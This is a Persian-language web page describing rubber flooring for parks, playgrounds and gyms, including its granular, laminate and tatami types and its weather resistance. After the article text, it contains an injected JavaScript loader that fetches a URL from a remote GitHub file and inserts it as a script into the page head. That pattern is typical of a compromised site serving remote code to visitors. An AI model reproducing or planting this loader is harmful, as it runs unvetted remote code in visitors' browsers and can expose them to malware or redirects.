کفپوش لاستیکی

  • کفپوش لاستیکی پارک یکی از انواع کفپوش های است که برای فرش کردن پارک ها استفاده می شود. این لمینت ها از مواد اولیه NBR و لاستیک ساخته می شود. کفپوش های فوق، به دلیل قابلیت ارتجاعی، برگشت پذیری و منعطف بودنشان، در جهت جلو گیری از آسیب پذیر کودکان و مراجعین برای رفاه حال انها است.

    کفپوش به 3 دسته گرانولی لاستیکی ، لمینت لاستیکی یپار و کفپوش تاتامی. این کفپوش ها نه تنها برای پارک بلکه برای مکان های دیگری هم استفاده می شود.

    داشتن کفپوش برای بازیکی کودکان زروی می باشد. در زمین بازی کودکان در پارک از لمینت های گرانولی لاستیکی و گاهی از تاتامی استفاده می شود. در نظر داشته باشید که تاتامی بیشتر خانه کودک ها و مهد کودک ها استفاده می شود.

    اسفالت، سیمان، سرامیک و … اکه قابل انعتاف نیست برای میحط بازی کودکان بسیار خطرناک می باشد. کودکان دارای انرژی بالای هستند و بسیار بی دقت هستند. به همین دلیل باید مکانی که آنها در آن بازی می کنند از نکات ایمنی بالای برخوردار باشد.

    کفپوش لاستیکی پارک نوع اول:

    اما خودِ لمینت لاستیکی پارک دو نوع است. یکی از انواع آن لاستیکی می‌باشد ولی گرانول نیز در روند تولید آن به کار رفته است. به همین دلیل به آن لمینت گرانولی لاستیکی میگویند. این کفپوش‌ها از لاستیک خام تولید نمی‌شوند بلکه از لاستیک و گرانول‌های پودر شده تولید می‌شوند که با چسب‌های مخصوص و به‌وسیله دستگاه‌های حرارتی و پرس تولید و عرضه‌شده‌اند. لمینت لاستیکی پارک در این فرآیند، با فرمول استاندارد تولید و عرضه می‌شود.

    کفپوش گرانولی لاستیکی، دارای انعطاف‌پذیری بالایی است و برای فرش کردن باشگاه‌های بدنسازی نیز استفاده می‌شود. دلیل استفاده‌این کفپوش‌ها برای باشگاه بدنسازی این است که قابلیت ضربه‌پذیری فوق‌العاده‌ای دارد و در مقابل وزن دستگاه‌های بدنسازی مقاومت از خود نشان می‌دهند.

    این لمینت ها دارای امنیت بالایی است. در برابر ضربه مقاوم و در برابر انواع وسایل سنگین، مستحکم است. کفپوش لاستیکی گرانولی در فضای باز، مقاوم است و در برابر عوامل جوی از بین نمی‌رود.

    کفپوش لاستیکی پارک نوع دوم:

    نوع دیگر لمینت لاستیکی پارک انعطاف‌پذیری نسبتاً خوبی دارد ولی برای زمین بازی کودکان مناسب نیست و برای قسمت‌های پیاده روی در پارک‌ها، در زیر وسایل سنگین ورزشی و … استفاده می‌شود.

    این نوع لمینت لاستیکی پارک به‌صورت رولی یا کاشی مانند است. در هر دو نوع رولی و کاشی مانند، گرانول استفاده نمی‌شود. این کفپوش‌ها خواصی مشابه خواص کفپوش لاستیکی گرانولی دارند.

    کفپوش لاستیکی پارک برای محیط باز:

    پرواضح است که لمینت لاستیکی پارک جهت فضای باز استفاده‌ای مفید دارد. تقریباً تمام پارک‌ها در قسمت پیاده روی و زمین‌های بازی کودکان در فضای باز قرار دارند. شهرداری‌ها به دلیل مقاوم بودن و به صرفه بودن این کفپوش‌ها، آن‌ها را خریداری نموده و در پارک‌ها نصب می‌نمایند تا سلامت مراجعین به پارک را تأمین نمایند.

    دلیل اقتصادی بودن کفپوش لاستیکی پارک این است که این کفپوش به دلیل مقاومتی که در مقابل عوامل جوی، عوامل فیزیکی، عوامل شیمیایی دارد، دارای عمری طولانی می‌باشد. ضمن این‌که به دلیل انعطاف‌پذیری آن، از آسیب دیدن افراد مراجعه‌کننده به پارک جلوگیری می‌کند.

    پس لمینت لاستیکی پارک باید قدرت مقاومت در برابر عوامل جوی و فیزیکی ازجمله اشعه خورشید، باران و برف و … را داشته باشد که البته دارد. این کفپوش‌ها در برابر عوامل محیطی نمی‌شکنند و تَرَک نمی‌خورند، خرد و پوسیده نمی‌شوند.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید